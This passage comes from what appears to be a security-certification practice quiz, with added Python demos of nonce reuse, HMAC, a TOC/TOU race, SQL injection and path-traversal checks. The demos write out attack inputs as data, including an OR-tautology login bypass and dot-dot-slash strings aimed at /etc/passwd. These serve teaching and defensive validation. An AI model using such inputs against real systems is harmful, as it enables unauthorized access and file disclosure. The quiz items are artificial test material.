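    An attacker who knows or guesses part of one plaintext reads the other directly."""
    c1, c2 = ctr_crypt(key, nonce, p1), ctr_crypt(key, nonce, p2)
    return xor(c1, c2)

if __name__ == "__main__":
    key, nonce = os.urandom(32), os.urandom(8)       # constructed demo key and nonce
    msg = b"attack at dawn"
    ct = ctr_crypt(key, nonce, msg)
    print(ctr_crypt(key, nonce, ct) == msg)           # True: decryption is the same XOR
    p1, p2 = b"transfer 100 EUR", b"transfer 900 EUR"
    print(nonce_reuse_leak(key, nonce, p1, p2) == xor(p1, p2))   # True: nonce reuse leaks P1 xor P2
```

Note that CTR provides confidentiality only; flipping a ciphertext bit flips the same plaintext bit, which is why GCM adds an authentication tag on top of the same counter construction. In real deployments the nonce comes from a counter or a random source that is never repeated for a given key.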

Which of the following combines a cryptographic hash function with a secret key to provide a means of
verifying both the authenticity and integrity of a message or data?

• MD5

• DSA

• HMAC

• DES
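
The keyed-hash construction asked about above, as an added example in Python (this code is not part of the original quiz). The key and message are constructed sample values; the forgery scenario contrasts an unkeyed SHA-256, which an attacker can simply recompute over a modified message, with an HMAC that cannot be recomputed without the key, which is why HMAC provides authenticity as well as integrity.

```python
import hashlib
import hmac

# Constructed sample values for this added example (not from the original page).
KEY = b"shared-secret-key-for-demo-only"          # assumed to be known only to sender and receiver
MESSAGE = b'{"account":"4711","amount":100,"to":"alice"}'


def mac_tag(key: bytes, message: bytes) -> bytes:
    """HMAC-SHA256 over message: H((K xor opad) || H((K xor ipad) || message))."""
    return hmac.new(key, message, hashlib.sha256).digest()


def mac_verify(key: bytes, message: bytes, received_tag: bytes) -> bool:
    """Recompute the tag and compare in constant time (no early-exit timing leak)."""
    return hmac.compare_digest(mac_tag(key, message), received_tag)


def plain_hash_verify(message: bytes, received_digest: bytes) -> bool:
    """Unkeyed SHA-256 check: detects accidental corruption but not a forger who
    recomputes the digest over a message of their own choosing."""
    return hmac.compare_digest(hashlib.sha256(message).digest(), received_digest)


def demo() -> dict:
    genuine_tag = mac_tag(KEY, MESSAGE)
    tampered = MESSAGE.replace(b'"amount":100', b'"amount":999')
    return {
        # Untouched message with the sender's tag: integrity and authenticity hold.
        "genuine": mac_verify(KEY, MESSAGE, genuine_tag),
        # Amount changed in transit but original tag kept: integrity check fails.
        "tampered_message": mac_verify(KEY, tampered, genuine_tag),
        # Attacker rewrites the message and recomputes an unkeyed hash: a plain
        # hash accepts it, because nothing ties the digest to a secret.
        "plain_hash_accepts_forgery": plain_hash_verify(
            tampered, hashlib.sha256(tampered).digest()),
        # Same forgery against HMAC, tag computed with a guessed key: rejected.
        "hmac_rejects_forgery": mac_verify(KEY, tampered, mac_tag(b"guessed-key", tampered)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The comparison uses hmac.compare_digest rather than == so that a mismatching tag takes the same time to reject regardless of where the first differing byte is.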

A type of digital document that verifies the identity of an individual, device, service, or organization in
online communications is known as:

• Encryption key

• Digital certificate

• Identity token

• Digital signature

What is the role of RA in PKI? (Select 2 answers)

• Accepting requests for digital certificates

• Validating digital certificates

• Authenticating the entity making the request

• Providing backup source for cryptographic keys

• Issuing digital certificates

Which of the answers listed below refers to a trusted third party responsible for issuing, revoking, and
managing digital certificates?

• RA

• DN

• CA

• CSP

Which of the following answers refers to a means for periodic publication of all digital certificates that
have been revoked?

• CRL

• OSPF

• RA

• CSR

Which of the answers listed below refers to a protocol that enables on-demand querying of the
revocation status of a digital certificate?

• CSP

• OCSP

• DN

• CRL

What is the fastest way to check the validity of a single digital certificate?

• CSR

• DN

• CRL

• OCSP

Which of the following answers can be used to describe self-signed digital certificates? (Select 3
answers)

• Backed by a well-known and trusted third party

• Not trusted by default by web browsers and other applications


• Used in trusted environments, such as internal networks and development environments

• Suitable for websites and other applications that are accessible to the public

• Trusted by default by web browsers and other applications

• Not backed by a well-known and trusted third party

A self-signed digital certificate is also referred to as:

• Client certificate

• EV certificate

• Server certificate

• Wildcard certificate

• None of the above

Third-party digital certificates, issued by trusted CAs, are automatically trusted by most browsers and
operating systems, involve a cost, and require validation of the applicant's identity. In contrast, self-
signed certificates, issued by the entity to itself, are not automatically trusted, are free to create and
use, and do not require validation by a CA.

• True

• False

In the context of digital certificates, the term "Root of trust" refers to the highest level of trust within a
PKI system. It is typically represented by a root CA, which is a trusted third party that serves as the
foundation for the entire PKI. All other entities in the PKI hierarchy, including intermediate CAs and end-
entities (such as web servers, email servers, user devices, IoT devices, and individual users), derive
their trust from this root. When a certificate is issued and signed by an intermediate CA, it gains trust
through a chain of trust back to the root CA. This hierarchical trust model allows users and systems to
trust certificates presented by websites, services, or individuals because they can trace the trust back
to the well-established root of trust.

• True

• False

Which of the answers listed below refers to a PKI trust model?

• Single CA model

• Hierarchical model (root CA + intermediate CAs)

• Mesh model (cross-certifying CAs)

• Web of trust model (no central CA; participants sign one another's keys)

• Chain of trust model (multiple CAs in a sequential chain)

• Bridge model (cross-certifying between separate PKIs)

• Hybrid model (combining aspects of different models)

• All of the above


Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

A type of digital certificate that can be used to secure multiple subdomains within a primary domain is
called:

• Root signing certificate

• Subject Alternative Name (SAN) certificate

• Extended Validation (EV) certificate

• Wildcard certificate

Which digital certificate type can secure multiple distinct domain names or subdomains with a single
certificate?

• Extended Validation (EV) certificate

• Wildcard certificate

• Subject Alternative Name (SAN) certificate

• Root signing certificate

Which of the answers listed below refers to an identifier used for PKI objects?

• OID

• DN

• SAN

• GUID

Exploiting a known vulnerability is a common threat vector for:

• Legacy systems/apps

• Unsupported systems/apps

• Newly released systems/apps

• Systems/apps with zero-day vulnerability

A solution that simplifies configuration of new wireless networks by allowing non-technical users to
easily configure network security settings and add new devices to an existing network is called:

• WPA

• WPS

• WEP

• WAP

Which of the wireless technologies listed below are considered potential threat vectors and should be
avoided due to their known vulnerabilities? (Select all that apply)

• WPS

• WAP

• WPA

• WAF

• WPA2

• WEP

The term "Evil twin" refers to a rogue WAP set up for eavesdropping or stealing sensitive user data. An
evil twin impersonates the legitimate AP: by advertising its own presence with the same Service Set
Identifier (SSID, a.k.a. network name), it appears as the legitimate AP to connecting hosts.

• True

• False

Which of the following answers refers to a threat vector specific to wired networks?

• ARP Spoofing

• VLAN hopping

• Cable tapping

• Port sniffing

• All of the above

Examples of threat vectors related to Bluetooth communication include: bluesmacking (a type of DoS
attack that targets Bluetooth devices by overwhelming them with excessive traffic), bluejacking (the
practice of sending unsolicited messages or data to a Bluetooth-enabled device), bluesnarfing (gaining
unauthorized access to a Bluetooth device and data theft), and bluebugging (gaining remote control
over a Bluetooth device).

• True

• False

Which of the answers listed below refers to the most probable cause of unauthorized access gained
through the exploitation of a specific network entry point?

• Outdated AV software

• Browser cookies

• Open service ports

• Insufficient logging and monitoring

The importance of changing default usernames and passwords can be illustrated by the example of
certain network devices (such as routers), which are often shipped with default and well-known admin
credentials that can be looked up on the web.

• True

• False

Which of the following would be the best solution for a company that needs IT services but lacks any IT
personnel?

• MSA

• MaaS

• MSP

• MSSP

Which of the terms listed below refers to a third-party vendor offering IT security management
services?

• MSP

• MaaS

• MSA

• MSSP

Which of the following answers refer to common threat vectors that apply to MSPs, vendors, and
suppliers in the supply chain? (Select 2 answers)

• Compliance violations

• Brand reputation damage

• Propagation of malware

• Operational disruptions

• Social engineering techniques

A social engineering technique whereby attackers, under the guise of a legitimate request, attempt to
gain access to confidential information is commonly referred to as:

• Phishing

• Smishing

• Pharming

• Spoofing

Which social engineering attack relies on identity theft?

• Pretexting

• Spear phishing

• Tailgating

• Impersonation

A BEC attack is an example of:

• Smishing

• Phishing

• Vishing

• Pharming

Which of the answers listed below refers to a social engineering technique where an attacker creates a
false scenario or situation to deceive the victim into revealing sensitive information?

• Impersonation

• Credential harvesting

• Pretexting

• Watering hole attack

Which of the following terms refers to a platform used for watering hole attacks?

• Mail gateways

• Websites

• PBX systems

• Web browsers

The term "URL hijacking" (a.k.a. "Typosquatting") refers to a deceptive practice involving the deliberate
registration of domain names with misspellings or slight variations that closely resemble well-
established and popular domain names. The primary goal of this strategy is to exploit the common
typographical errors made by users while entering URLs into their web browser's address bar. Beyond
capturing inadvertent traffic, typosquatting may also be used for hosting phishing sites to trick users
into divulging sensitive information, distributing malware through deceptive websites, generating ad
revenue by redirecting mistyped traffic, or engaging in brand impersonation to harm the reputation of
authentic brands or deceive users.

• True

• False

Which type of application attack relies on introducing external code into the address space of a running
program?

• Buffer overflow

• Memory injection

• Replay attack

• Pointer dereference

Which of the answers listed below refers to an application attack that relies on executing a library of
code?

• Memory leak

• DLL injection

• Pointer dereference

• Buffer overflow

A type of exploit in which an application overwrites the contents of a memory area it should not have
access to is called:

• DLL injection

• Buffer overflow

• Memory leak

• Privilege escalation

A malfunction in a preprogrammed sequential access to a shared resource is described as:

• Race condition

• Concurrency error

• Multithreading

• Synchronization error

A type of vulnerability where the state of a resource is verified at one point in time but may change
before the resource is actually used is referred to as:

• TOC

• TOC/TOU

• TOU

• TSIG
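
A minimal TOC/TOU race, as an added example in Python (not code from the original quiz). It assumes a POSIX system with symlink support and O_NOFOLLOW. The file names, contents and the "attacker" callback are constructed for the demo; the callback stands in for the window between the check and the use, which in a real race is a timing gap the attacker wins by repeatedly swapping the file rather than a hook the program calls.

```python
import os
import stat
import tempfile


def read_regular_file_vulnerable(path, between_check_and_use=lambda: None):
    """TOC/TOU pattern: validate the *name*, then open the *name* again later."""
    st = os.lstat(path)                          # time of check
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("refusing non-regular file")
    between_check_and_use()                      # window in which an attacker can act
    with open(path, "rb") as f:                  # time of use: the name is resolved again
        return f.read()


def read_regular_file_safe(path):
    """Open once, then validate the descriptor that will actually be used."""
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)   # O_NOFOLLOW: ELOOP if path is a symlink
    fd = os.open(path, flags)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):      # check the open object, not the name
            raise PermissionError("refusing non-regular file")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:               # same descriptor: nothing can be swapped in between
        return f.read()


def demo() -> dict:
    """Constructed scenario: a 'public' file the program may read and a 'secret' it must not."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "public.txt")
        secret = os.path.join(d, "secret.txt")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")

        def reset():
            if os.path.lexists(public):
                os.remove(public)
            with open(public, "wb") as f:
                f.write(b"harmless")

        def attacker_swaps_in_symlink():
            os.remove(public)
            os.symlink(secret, public)

        reset()
        leaked = read_regular_file_vulnerable(public, attacker_swaps_in_symlink)

        reset()
        normal = read_regular_file_safe(public)
        attacker_swaps_in_symlink()
        try:
            read_regular_file_safe(public)
            blocked = False
        except OSError:                          # ELOOP from O_NOFOLLOW, or PermissionError
            blocked = True
        return {"vulnerable_leaked": leaked, "safe_normal": normal, "safe_blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The fix is not a faster check but removing the gap: the object is opened first and every property is read from the open descriptor, so whatever the path name points to afterwards no longer matters.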

A malicious application update is a type of malware that can be installed through a seemingly
legitimate software update. The introduction of a malicious update into the application code can be
enabled through various means, including:

• Unsigned application code

• Unencrypted update channel (HTTP vs HTTPS)

• Fake update website

• Unauthorized access to update server


• Compromised software development process

• All of the above

Which of the following answers does not refer to a common type of OS-based vulnerability?

• Access control and permissions vulnerabilities (weak passwords, privilege escalation)

• Vulnerabilities in installed applications, system utilities, and device drivers

• Memory-related vulnerabilities (memory leaks, buffer overflows, race conditions)

• Patch and update management vulnerabilities (security patch and update delays, malicious
updates)

• Vulnerabilities related to system/security misconfigurations

• Network-related vulnerabilities (DoS attacks, remote code execution attacks)

• All of the above answer choices are examples of OS-based vulnerabilities

Which of the programming aspects listed below are critical in the secure application development
process? (Select 2 answers)

• Patch management

• Input validation

• Password protection

• Error and exception handling

• Application whitelisting

A situation in which a web form field accepts data other than expected (e.g., server commands) is an
example of:

• Zero-day vulnerability

• Improper input validation

• Default configuration

• Improper error handling

Which of the following answers refers to a countermeasure against code injection?

• Fuzzing

• Input validation

• Code signing

• Normalization

The term "Secure cookie" refers to an HTTP cookie carrying the Secure attribute, which instructs the
browser to send it only over an encrypted HTTPS connection; this helps prevent the cookie from being
intercepted or tampered with in transit.

• True

• False
Which of the terms listed below refers to an automated or manual code review process aimed at
discovering logic and syntax errors in the application's source code?

• Input validation

• Dynamic code analysis

• Fuzzing

• Static code analysis

A dynamic code analysis allows for detecting application flaws without the need for actual execution
of the application code.

• True

• False

The term "Static code analysis" refers to the process of discovering application runtime errors.

• True

• False

What is the purpose of code signing? (Select 2 answers)

• Disables code reuse

• Confirms the application's source of origin

• Enables application installation

• Validates the application's integrity

• Protects the application against unauthorized use

The practice of finding vulnerabilities in an application by feeding it incorrect input is called:

• Normalization

• Hardening

• Dynamic code analysis

• Fuzzing

In computer security, a mechanism for safe execution of untested code or untrusted applications is
referred to as:

• Sideloading

• Virtualization

• Sandboxing

• Stress testing

Which of the following answers refers to a Windows-specific feature for handling exceptions, errors,
and abnormal conditions in software?

• EPC

• SEH

• EH

• EXR

Address Space Layout Randomization (ASLR) is an OS security technique that randomizes the location
of key data areas in memory. The purpose of ASLR is to prevent attackers from predicting the location
of specific code or data in memory, which adds a layer of defense against memory-based attacks, such
as buffer overflows.

• True

• False

A challenge-response test used to tell human users apart from automated software (such as network
bots) is known as:

• MFA

• CAPTCHA

• SSO

• NIDS

Which of the answers listed below refers to a security vulnerability that enables inserting malicious
code into input fields, such as search bars or login forms, to execute unauthorized commands on a
database?

• RCE

• SQLi

• XSS

• CSRF

Which of the following indicates an SQL injection attack attempt?

• DELETE FROM itemDB WHERE itemID = '1';

• SELECT * FROM users WHERE userName = 'Alice' AND password = '' OR '1' = '1';

• DROP TABLE itemDB;

• SELECT * FROM users WHERE email = '[email protected]' AND password = '';
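
The tautology from the answer above, run against a constructed in-memory SQLite table as an added example in Python (not code from the original quiz). The vulnerable function concatenates the user's input into the statement, so the quotes and OR become part of the SQL grammar; the hardened one binds parameters, so the same input is just a password that matches nothing. The allowlist pattern for user names is an assumption for the demo, shown as the input-validation layer the quiz mentions elsewhere.

```python
import re
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed user (real systems store salted, stretched hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Alice', 'correct horse')")
    return conn


def login_vulnerable(conn, user: str, pw: str):
    """String concatenation: user input becomes part of the SQL statement's grammar."""
    sql = ("SELECT * FROM users WHERE userName = '" + user
           + "' AND password = '" + pw + "';")
    return conn.execute(sql).fetchone() is not None, sql


def login_parameterized(conn, user: str, pw: str):
    """Bound parameters: values travel separately from the statement, so quotes stay data."""
    sql = "SELECT * FROM users WHERE userName = ? AND password = ?;"
    return conn.execute(sql, (user, pw)).fetchone() is not None, sql


USERNAME_ALLOWLIST = re.compile(r"[A-Za-z0-9_.-]{1,32}")   # assumed policy for the demo


def username_is_valid(user: str) -> bool:
    """Allowlist validation as a second layer: reject anything not shaped like a user name."""
    return USERNAME_ALLOWLIST.fullmatch(user) is not None


def demo() -> dict:
    conn = make_demo_db()
    payload = "' OR '1' = '1"              # the tautology from the quiz answer
    vuln_ok, _ = login_vulnerable(conn, "Alice", "correct horse")
    vuln_wrong, _ = login_vulnerable(conn, "Alice", "wrong")
    vuln_inj, rendered = login_vulnerable(conn, "Alice", payload)
    safe_inj, _ = login_parameterized(conn, "Alice", payload)
    safe_ok, _ = login_parameterized(conn, "Alice", "correct horse")
    return {
        "vulnerable_correct_password": vuln_ok,
        "vulnerable_wrong_password": vuln_wrong,
        "vulnerable_injected": vuln_inj,          # True: authentication bypassed
        "rendered_injected_query": rendered,      # the exact statement the database saw
        "parameterized_injected": safe_inj,       # False: payload treated as a literal password
        "parameterized_correct_password": safe_ok,
        "payload_passes_username_allowlist": username_is_valid(payload),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The rendered statement is the one in the quiz answer: AND binds tighter than OR, so the WHERE clause becomes (userName = 'Alice' AND password = '') OR '1' = '1', which is true for every row. Parameterization is the primary defence; input validation narrows what reaches the query but should not be the only control.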

Which of the answers listed below describe the characteristics of a cross-site scripting attack? (Select
3 answers)

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests


• Website executes attacker's requests

Which of the following answers refers to a type of software embedded into a hardware chip?

• Firmware

• Middleware

• Device driver

• Machine code

Which of the terms listed below refers to a product's life-cycle management phase in which a product
is no longer being produced or sold?

• EOS

• EOF

• EOL

• EOA

What is the main vulnerability related to legacy hardware?

• Compatibility issues

• Lack of security updates and patches

• Worn-out physical components

• Lack of skilled personnel to run it and maintain it

The term "VM escape" refers to the process of breaking out of the boundaries of a guest operating
system installation to access the primary hypervisor controlling all the virtual machines on the host
machine.

• True

• False

Which of the following answers refers to a virtualization-related vulnerability where virtualized assets
allocated to one VM are improperly isolated and can be accessed or compromised by another VM?

• Resource reuse

• Privilege escalation

• Resource exhaustion

• Concurrent session usage

Which of the answers listed below refers to a cloud-related vulnerability type?

• Insecure APIs

• Poor access controls

• Lack of security updates

• Misconfigured cloud storage


• Shadow IT / Malicious insiders

• All of the above

The practice of installing mobile apps from websites and app stores other than the official
marketplaces is referred to as:

• Jailbreaking

• Rooting

• Sideloading

• Carrier unlocking

Which of the following terms is used to describe the process of removing software restrictions imposed
by Apple on its iOS operating system?

• Sideloading

• Carrier unlocking

• Rooting

• Jailbreaking

The term "Rooting" refers to the capability of gaining administrative access to the operating system and
system applications on:

• Android devices

• iOS devices

• Microsoft devices

• All types of mobile devices

A type of attack that exploits a vulnerability present in already released software but unknown to the
software developer (so no patch exists yet) is known as:

• On-path attack

• IV attack

• Zero-day attack

• Replay attack

Malware that restricts access to a computer system by encrypting files or locking the entire system
down until the user performs a requested action (typically paying a ransom) is called:

• Grayware

• Adware

• Ransomware

• Spyware

A Trojan horse is a type of software that performs harmful actions under the guise of a legitimate and
useful program. The most characteristic feature of Trojan horse is that while it may function as a
legitimate program and possess all the expected functionalities, it also contains a concealed portion of
malicious code that the user is unaware of.

• True

• False

Which type of Trojan enables unauthorized remote access to a compromised system?

• APT

• RAT

• MaaS

• PUP

A standalone malicious computer program that typically propagates itself over a computer network to
adversely affect system resources and network bandwidth is referred to as:

• Worm

• Fileless virus

• Bot

• Logic bomb

Malicious software collecting information about users without their knowledge/consent is known as:

• Cryptomalware

• Adware

• Ransomware

• Spyware

Which of the answers listed below refer to the characteristic features of bloatware? (Select 3 answers)

• Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance

• Installed without user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security

Which of the following answers refer to the characteristics of a PUP? (Select 3 answers)

• Often installed without clear user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security

• Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance

Which of the statements listed below apply to the definition of a computer virus? (Select 3 answers)

• A self-replicating computer program containing malicious segment

• Malware that typically requires its host application to be run to make the virus active

• A standalone malicious computer program that replicates itself over a computer network

• Malware that can run by itself without any interaction

• Malicious code that typically attaches itself to an application program or other executable
component

• A self-contained malicious program or code that does not need a host to propagate itself

Which of the following is an example of spyware?

• Keylogger

• Vulnerability scanner

• Computer worm

• Packet sniffer

Malicious code activated by a specific event is called:

• Cryptomalware

• Backdoor

• Rootkit

• Logic bomb

Which of the following answers refers to a collection of software tools used by a hacker to mask
intrusion and obtain administrator-level access to a computer or computer network?

• Rootkit

• Spyware

• Backdoor

• Trojan

The term "RFID cloning" refers to copying the data stored on any RFID-enabled device (including tags,
cards, key fobs, implants, and other objects embedded with RFID technology) onto another RFID-
enabled device, which can then be read and used in the same way as the original tag. While RFID
cloning can be used for legitimate purposes, such as replicating important tags for backup and
testing, it also poses a significant security risk, as duplicate tags can potentially be used for
gaining unauthorized access or unauthorized information disclosure.

• True

• False
As opposed to simple DoS attacks that usually are performed from a single system, a DDoS attack
uses multiple compromised computer systems to perform the attack against its target. The
intermediary systems that are used as a platform for the attack (often referred to as zombies, and
collectively as a botnet) are the secondary victims of the DDoS attack.

• True

• False

A type of DDoS attack where an attacker exploits vulnerabilities in certain services or protocols to
generate responses that are much larger than the original request is referred to as:

• Amplified DDoS attack

• Volumetric DDoS attack

• Reflected DDoS attack

• Application DDoS attack

What defines a reflected DDoS attack?

• Overwhelming the target with a high volume of traffic to saturate its bandwidth

• Exploiting vulnerabilities in network protocols to consume resources and disrupt services

• Utilizing third-party servers to reflect and amplify attack traffic towards the target

• Targeting vulnerabilities in applications or web servers to exhaust resources

A DNS amplification attack is a type of DDoS attack wherein an attacker sends a small, specially
crafted DNS query with a spoofed source IP address (the victim's IP) to an open DNS resolver (one that
answers queries from any source). Upon receiving the query, the DNS server generates a much larger
response packet, which is then sent to the victim's IP address, causing potential disruption due to
overwhelming traffic.

• True

• False

Which of the answers listed below refers to a cyberattack technique that relies on providing false DNS
information to a DNS resolver for the purpose of redirecting or manipulating the resolution of domain
names to malicious IP addresses?

• DNS spoofing

• Credential stuffing

• URL hijacking

• Domain hijacking

Remapping a domain name to a rogue IP address is an example of what kind of exploit?

• URL hijacking

• DNS cache poisoning

• Domain hijacking
• ARP poisoning

When domain registrants, due to unlawful actions of third parties, lose control over their domain names,
they fall victim to:

• Sybil attack

• Domain hijacking

• Typosquatting

• URL hijacking

Which of the following can be classified as malicious activity indicator on a wireless network?

• Rogue AP

• Jump server

• Unmanaged switch

• Network tap

The practice of gaining unauthorized access to a Bluetooth device is known as:

• Phishing

• Bluejacking

• Smishing

• Bluesnarfing

A wireless disassociation attack is a type of: (Select 2 answers)

• Downgrade attack

• Deauthentication attack

• Brute-force attack

• DoS attack

• Cryptographic attack

A wireless jamming attack is a type of:

• Cryptographic attack

• DoS attack

• Brute-force attack

• Downgrade attack

Which of the answers listed below refers to an RFID vulnerability?

• Spoofing

• Eavesdropping
• RFID cloning

• Data interception

• Replay attack

• DoS attack

• All of the above

Which of the following is a vulnerability characteristic of NFC communication?

• Eavesdropping

• Data interception

• Replay attacks

• DoS attacks

• All of the above

Which wireless attack focuses on exploiting vulnerabilities found in WEP?

• IV attack

• War driving

• SSID spoofing

• Bluejacking

Which of the statements listed below can be used to describe the characteristics of an on-path
attack? (Select all that apply)

• An on-path attack is also known as MITM attack

• Attackers place themselves on the communication route between two devices

• Attackers intercept or modify packets sent between two communicating devices

• Attackers do not have access to packets exchanged during the communication between two
devices

A network replay attack occurs when an attacker captures sensitive user data and resends it to the
receiver with the intent of gaining unauthorized access or tricking the receiver into unauthorized
operations.

• True

• False

What are the characteristic features of a session ID? (Select all that apply)

• Enables the server to identify the session and retrieve the corresponding session data

• A unique identifier assigned by the website to a specific user

• Contains user's authentication credentials, e.g., username and password


• A piece of data that can be stored in a cookie, or embedded as a URL parameter

• Stored on the client side (in the user's browser) and sent to the server with each request

• A unique identifier assigned to a server

In a session replay attack, an attacker intercepts and steals a valid session ID of a user and resends it
to the server with the intent of gaining unauthorized access to the user's session or tricking the server
into unauthorized operations on behalf of the legitimate user.

• True

• False

A technique that allows an attacker to authenticate to a remote server using a captured password
hash, without recovering the cleartext password from that digest, is called:

• Pass the hash

• Replay attack

• Brute-force attack

• Spraying attack

What type of action allows an attacker to exploit the XSS vulnerability?

• Code injection

• Privilege escalation

• Session hijacking

• Packet sniffing

Which of the following exploits targets a protocol used for managing and accessing networked
resources?

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

• SQL injection attack

Which type of exploit targets web applications that generate content used to store and transport data?

• SQL injection attack

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

Which of the following facilitate(s) privilege escalation attacks? (Select all that apply)

• System/application vulnerabilities

• Password hashing

• System/application misconfigurations

• Network segmentation

• Social engineering techniques

Which of the statements listed below apply to the CSRF/XSRF attack? (Select 3 answers)

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

A dot-dot-slash attack is also referred to as:

• Disassociation attack

• On-path attack

• Directory traversal attack

• Downgrade attack
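
The dot-dot-slash check a file-serving endpoint needs, as an added example in Python (not code from the original quiz). The base directory, the report file and the list of client-supplied paths are constructed for the demo. Percent-encoded and backslash variants are included because filtering the literal string "../" alone is a common incomplete fix; the decisive check is that the fully resolved path still lies under the resolved base directory.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_under(base_dir: str, user_path: str) -> str:
    """Map a client-supplied relative path to a file inside base_dir, or raise ValueError."""
    decoded = unquote(unquote(user_path))        # undo %2e%2e%2f and double-encoded variants
    decoded = decoded.replace("\\", "/")         # treat backslash as a separator too
    if decoded.startswith("/") or "\x00" in decoded:
        raise ValueError("absolute path or NUL byte not allowed")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' segments and follows symlinks, so a link inside base
    # that points outside is caught as well.
    candidate = os.path.realpath(os.path.join(base, decoded))
    # commonpath rejects sibling directories that merely share a prefix (e.g. base + '2').
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate


def demo() -> dict:
    """Constructed inputs: which ones a file-serving endpoint should accept."""
    inputs = [
        "reports/q1.txt",
        "reports/../reports/q1.txt",
        "../../etc/passwd",
        "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "..\\..\\windows\\win.ini",
        "/etc/passwd",
    ]
    results = {}
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "reports"))
        with open(os.path.join(base, "reports", "q1.txt"), "w") as f:
            f.write("constructed report")
        for p in inputs:
            try:
                resolve_under(base, p)
                results[p] = "allowed"
            except ValueError:
                results[p] = "rejected"
    return results


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{path!r}: {verdict}")
```

Note that "reports/../reports/q1.txt" is allowed: the rule is not "no dot-dot anywhere" but "the final resolved location stays inside the directory", which is what actually prevents reading files outside the web root.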

Hardware RAID Level 0: (Select all that apply)

• Requires a minimum of 2 drives to implement

• Is also known as disk striping

• Decreases reliability (failure of any disk in the array results in the loss of all data in the array)

• Is also referred to as disk mirroring

• Offers less volume capacity in comparison to RAID 1

• Requires at least 3 drives to implement

• Is suitable for systems where performance has higher priority than fault tolerance

• Offers improved reliability by creating identical data sets on each drive (failure of one drive does
not destroy the array as each drive contains identical copy of the data)

Hardware RAID Level 1: (Select 3 answers)

• Requires at least 2 drives to implement

• Is also known as disk striping

• Offers improved performance in comparison to RAID 0

• Requires at least 3 drives to implement

• Offers improved reliability by creating identical data sets on each drive (failure of one drive does
not destroy the array as each drive contains identical copy of the data)

• Is also referred to as disk mirroring

Hardware RAID Level 5: (Select 3 answers)

• Requires at least 2 drives to implement

• Continues to operate in case of failure of more than 1 drive

• Is also known as disk striping with double parity

• Requires at least 3 drives to implement

• Offers increased performance and fault tolerance (single drive failure does not destroy the array
and lost data can be re-created by the remaining drives)

• Requires at least 4 drives to implement

• Is also known as disk striping with parity

Hardware RAID Level 6: (Select 3 answers)

• Is also known as disk striping with parity

• Requires at least 4 drives to implement

• Offers increased performance and fault tolerance (failure of up to 2 drives does not destroy the
array and lost data can be re-created by the remaining drives)

• Requires at least 3 drives to implement

• Is also known as disk striping with double parity

• Continues to operate in case of failure of more than 2 drives

• Requires at least 5 drives to implement

Hardware RAID Level 10 (a.k.a. RAID 1+0): (Select 3 answers)

• Requires a minimum of 4 drives to implement

• Is referred to as stripe of mirrors, i.e., a combination of RAID 1 (disk mirroring) and RAID 0 (disk
striping)

• Requires a minimum of 5 drives to implement

• Offers increased performance and fault tolerance (failure of one drive in each mirrored pair of
disk drives does not destroy the array)

• Requires a minimum of 3 drives to implement

• Continues to operate in case of failure of more than 2 drives

• Is referred to as stripe of mirrors, i.e., a combination of RAID 1 (disk striping) and RAID 0 (disk
mirroring)

Which of the following RAID levels does not offer fault tolerance?

• RAID 6

• RAID 10

• RAID 5

• RAID 0

• RAID 1
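
How "lost data can be re-created by the remaining drives" actually works for RAID 5, as an added example in Python (not code from the original quiz). It assumes a four-drive array with 4-byte stripe units and a constructed data payload; the parity is the XOR of the data units in each stripe, so any single missing unit, data or parity, is the XOR of the survivors. The same XOR helper shows why RAID 0 has no such recovery and why a second failure needs RAID 6's second parity.

```python
from functools import reduce

CHUNK = 4   # bytes per stripe unit, kept small for the demo


def xor_blocks(blocks):
    """Bytewise XOR of equal-length blocks; this is the RAID 5 parity function."""
    return bytes(reduce(lambda a, b: a ^ b, column) for column in zip(*blocks))


def parity_drive_for_stripe(stripe: int, n_drives: int) -> int:
    """RAID 5 rotates the parity unit across drives so no single drive becomes a hotspot."""
    return (n_drives - 1 - stripe) % n_drives


def raid5_write(data: bytes, n_drives: int):
    """Stripe data across n_drives with one parity unit per stripe; returns per-drive unit lists."""
    if n_drives < 3:
        raise ValueError("RAID 5 needs at least 3 drives")
    per_stripe = CHUNK * (n_drives - 1)
    data += b"\0" * ((-len(data)) % per_stripe)           # pad the last stripe
    drives = [[] for _ in range(n_drives)]
    for s in range(len(data) // per_stripe):
        stripe = data[s * per_stripe:(s + 1) * per_stripe]
        units = [stripe[i:i + CHUNK] for i in range(0, per_stripe, CHUNK)]
        p = parity_drive_for_stripe(s, n_drives)
        unit_iter = iter(units)
        for d in range(n_drives):
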